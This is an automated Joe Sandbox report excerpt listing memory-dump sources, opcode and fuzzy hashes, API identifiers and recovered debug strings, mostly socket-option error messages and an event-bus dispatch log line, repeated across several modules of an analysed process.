                                                                    • Opcode Fuzzy Hash: f8427a8a7679de89cbdc30ff2bcea82045dd5e485bc0249782d8f8000ba83129
                                                                    • Instruction Fuzzy Hash: D4F09661F0C90286F31057ABB8401BD66A9AB847B4F148279EC2E837B4DF7CD9868702
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastfflushfwriteioctlsocket
                                                                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                                    • API String ID: 325303940-110789774
                                                                    • Opcode ID: bed407a83d51540a350cb8335cceb301b7c72c53630572f62c028a70d1901d82
                                                                    • Instruction ID: c93151614f0654d65c6c4737e76e66ec15da517d7736c47f000e6d7a3c32404b
                                                                    • Opcode Fuzzy Hash: bed407a83d51540a350cb8335cceb301b7c72c53630572f62c028a70d1901d82
                                                                    • Instruction Fuzzy Hash: 09F06265F089028AF351576BB8001A95160AFA47B4F908272ED3DA37B5DE7CD9868708
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastfflushfwriteioctlsocket
                                                                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                                    • API String ID: 325303940-110789774
                                                                    • Opcode ID: 491ca2efa7c855bf823389286f95842b7971bdf9ad15312334074ab60ee9df2f
                                                                    • Instruction ID: b863847fb005974a83a2e0bffbd140d00f9f0b9058f3cc7cfceae45471eb5ec5
                                                                    • Opcode Fuzzy Hash: 491ca2efa7c855bf823389286f95842b7971bdf9ad15312334074ab60ee9df2f
                                                                    • Instruction Fuzzy Hash: 31F068A1F0C64356F3345F69A8002B65660EB94754F148235DCAE937B4DE7C98568F01
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastfflushfwriteioctlsocket
                                                                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                                    • API String ID: 325303940-110789774
                                                                    • Opcode ID: d3d6cafc339255e44dc4f8f813a1e45e8922b849a73ed3aff8649ef9906618f3
                                                                    • Instruction ID: 8e8f1632efcf70731c77d9d74c904190025bfe4598a1f9742a00334741f9e840
                                                                    • Opcode Fuzzy Hash: d3d6cafc339255e44dc4f8f813a1e45e8922b849a73ed3aff8649ef9906618f3
                                                                    • Instruction Fuzzy Hash: B0F06261F0C64386F7315F69B8005B562A0EB94794F108235EDED837B8EE3CD9468B00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastfflushfwriteioctlsocket
                                                                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                                    • API String ID: 325303940-110789774
                                                                    • Opcode ID: 038bd755b02e3f66869641aed01428454bc9ad9afd8f2a63b256f54e22478d64
                                                                    • Instruction ID: 870fc476feb7476d5cc8d1c48a009b682ab317de71b8f504275f92555c910757
                                                                    • Opcode Fuzzy Hash: 038bd755b02e3f66869641aed01428454bc9ad9afd8f2a63b256f54e22478d64
                                                                    • Instruction Fuzzy Hash: 0AF08B21F0C2D3AAF7145769A8841B91160EF84394F004132ECAD833F5DE3ED8468702
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastfflushfwriteioctlsocket
                                                                    • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                                    • API String ID: 325303940-110789774
                                                                    • Opcode ID: 3e4103bee5abb71778d63ab542923b9989150a137cd39017df41709a0e9334bd
                                                                    • Instruction ID: ccf33a5c32118901ec496bd670a40ee1e6eabfcbd21bca98c2352e6775a8bb95
                                                                    • Opcode Fuzzy Hash: 3e4103bee5abb71778d63ab542923b9989150a137cd39017df41709a0e9334bd
                                                                    • Instruction Fuzzy Hash: 16F09671F0D64386F7105769B8401B55260EF94794F108237EDAE837B5DE3CD94AC701
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastsetsockopt
                                                                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                                    • API String ID: 1729277954-3534120083
                                                                    • Opcode ID: f4be86383b398c225cc35a14900dc2f2bc6b3d5b8b51f935d6a72211b772bdd5
                                                                    • Instruction ID: 2b5e8a3bdf79a0cf311df38fa03036a9ef22944664684041750a049ecc9a5efb
                                                                    • Opcode Fuzzy Hash: f4be86383b398c225cc35a14900dc2f2bc6b3d5b8b51f935d6a72211b772bdd5
                                                                    • Instruction Fuzzy Hash: 84F0F661B0890286F3105BABB8402BA7665AB843B0F009275ED2D837B4DF7CD98ACB01
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastsetsockopt
                                                                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                                    • API String ID: 1729277954-3534120083
                                                                    • Opcode ID: a9890d17be8931ba777a89cde027a022ff399b940b8433dea79f3717e2de508b
                                                                    • Instruction ID: ca4982b312aae620d7789e14e5bddbd0ed20f690f476adaf6c7559bb5fc8cd13
                                                                    • Opcode Fuzzy Hash: a9890d17be8931ba777a89cde027a022ff399b940b8433dea79f3717e2de508b
                                                                    • Instruction Fuzzy Hash: D4F0F661B089028EF3105B67B8005AA6660ABA87B4F004271ED7D937B5DF7CD94AC704
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastsetsockopt
                                                                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                                    • API String ID: 1729277954-3534120083
                                                                    • Opcode ID: f73191922408c38ddcde4302cf36f1d3d11bbd068eba9f1f2a5320039dc8a134
                                                                    • Instruction ID: 0c50c3a0fcaea9f8db117fbf5e5b6d31f947e0e6e55d26d532de15909191020d
                                                                    • Opcode Fuzzy Hash: f73191922408c38ddcde4302cf36f1d3d11bbd068eba9f1f2a5320039dc8a134
                                                                    • Instruction Fuzzy Hash: 5AF096B2B186425AF3205F19B8006A56660EB88764F108231EDAD83BF4DF7DD945CF00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastsetsockopt
                                                                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                                    • API String ID: 1729277954-3534120083
                                                                    • Opcode ID: 368fcba44050ba1319e43864ff13c1c46c372c64a79d6944062e587744854559
                                                                    • Instruction ID: f7c67945d54c72f3016699402fcb5540ddc479ae630bad96004813edab8f1beb
                                                                    • Opcode Fuzzy Hash: 368fcba44050ba1319e43864ff13c1c46c372c64a79d6944062e587744854559
                                                                    • Instruction Fuzzy Hash: F0F09665B0C1428AF3305F19A8005B966A1EBC47A4F008231EDDD837B8DF7CD94ACF00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastsetsockopt
                                                                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                                    • API String ID: 1729277954-3534120083
                                                                    • Opcode ID: 7cb9fb6779b5c95c1cc7d7e2f9da55888ed15e20daf20baedfc529e281c235e6
                                                                    • Instruction ID: 6847baad9809a775e0abf6694e098306a5663d149a0ce38e112db8c76d01c683
                                                                    • Opcode Fuzzy Hash: 7cb9fb6779b5c95c1cc7d7e2f9da55888ed15e20daf20baedfc529e281c235e6
                                                                    • Instruction Fuzzy Hash: 76F02B62B08192AAF3105F69F8842B66560BB843A0F008231ED9D837F5DF3DD546DB01
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastsetsockopt
                                                                    • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                                    • API String ID: 1729277954-3534120083
                                                                    • Opcode ID: 6f2b0580ac5e605570fbaebc72f07140d3916ffc578ac77e8f5814e9907ee8f3
                                                                    • Instruction ID: 5a29a860c574cdaccfa7e62a096f580d5dbb35840b9e4c6de897eab532d3ee32
                                                                    • Opcode Fuzzy Hash: 6f2b0580ac5e605570fbaebc72f07140d3916ffc578ac77e8f5814e9907ee8f3
                                                                    • Instruction Fuzzy Hash: 7BF09671B085478AF3505B6AB8005B66661AB887A4F108237EDED837B5DF7CD589C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastsetsockopt
                                                                    • String ID: [E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_keepalive
                                                                    • API String ID: 1729277954-536111009
                                                                    • Opcode ID: 51a143680fcac23f95efcb46de4bc005422820b1c01712509800bcbb99f1957f
                                                                    • Instruction ID: 484e6f56c34f4edb3233ff91d97229afbfd934e566c1fc938109daba267b6fb4
                                                                    • Opcode Fuzzy Hash: 51a143680fcac23f95efcb46de4bc005422820b1c01712509800bcbb99f1957f
                                                                    • Instruction Fuzzy Hash: A7F0BB61B0894286F3105BA7B8405797A64BF88774F508375ED6D837B4DF7CD54A8B01
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: memsetstrchr
                                                                    • String ID: [D] (%s) -> %s$sam3_recv_rsp
                                                                    • API String ID: 2564583029-4292814133
                                                                    • Opcode ID: 236996f84fbe9f88ce6297d9ca011b89064f0fed0328767d615cc4ef45d0e1af
                                                                    • Instruction ID: 51764baa7d0f8a4be24244eed89b15c2b839d03061343da779ae6e25f6b72831
                                                                    • Opcode Fuzzy Hash: 236996f84fbe9f88ce6297d9ca011b89064f0fed0328767d615cc4ef45d0e1af
                                                                    • Instruction Fuzzy Hash: 88218122B0CE4341FB2155AB68243BD66594F427B0F5C93B4EE7D8A7F9EE1CA8425601
                                                                    APIs
                                                                    Strings
                                                                    • ebus_dispatch, xrefs: 00007FFE11509ACA
                                                                    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE11509AD1
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                                                    • API String ID: 3168844106-1717220914
                                                                    • Opcode ID: 907b831c72d46e904700da3e0436979447e90e2a26e5c4a6095f1d20295a2932
                                                                    • Instruction ID: baf1a3e3098a6f73b62998b36b3189183f855c23186113d62ab59d4af1713565
                                                                    • Opcode Fuzzy Hash: 907b831c72d46e904700da3e0436979447e90e2a26e5c4a6095f1d20295a2932
                                                                    • Instruction Fuzzy Hash: F9214F32A08E4281EB519F56E84417D77B9FB84BA4F544175DA5D477B8EF3CD881C700
                                                                    APIs
                                                                    Strings
                                                                    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE0EB4EEF1
                                                                    • ebus_dispatch, xrefs: 00007FFE0EB4EEEA
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                                                    • API String ID: 3168844106-1717220914
                                                                    • Opcode ID: 53611b293818d15e9ce415c90b29aeb7aea56c18796fbd7426b48b77701d6037
                                                                    • Instruction ID: 1afcc7de5b9a81d86a42b0014893e3bfe4a033ec4e46f5a9b3cf3c1b9785655c
                                                                    • Opcode Fuzzy Hash: 53611b293818d15e9ce415c90b29aeb7aea56c18796fbd7426b48b77701d6037
                                                                    • Instruction Fuzzy Hash: BA21F972A18B8682EB709F15E840179A7A0FB84B98F144135DEDD8B778DF3CE891CB00
                                                                    APIs
                                                                    Strings
                                                                    • ebus_dispatch, xrefs: 00007FFE0EBD180A
                                                                    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE0EBD1811
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                                                    • API String ID: 3168844106-1717220914
                                                                    • Opcode ID: 2c23bc5151dd6815fe962a8ec99b3b803cdf94b3d23d6896db3c00dcb89a2e16
                                                                    • Instruction ID: 4ebd254fcb1284d6fed9895d10cd370cfe77ebcc34f771acc793b8ef74234778
                                                                    • Opcode Fuzzy Hash: 2c23bc5151dd6815fe962a8ec99b3b803cdf94b3d23d6896db3c00dcb89a2e16
                                                                    • Instruction Fuzzy Hash: 1721FC32A0DB8285EB75CF15E8401A9A7A4FB44B94F544135DADD87778EF3CD851CB00
                                                                    APIs
                                                                    Strings
                                                                    • ebus_dispatch, xrefs: 00007FFE0E16180A
                                                                    • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFE0E161811
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
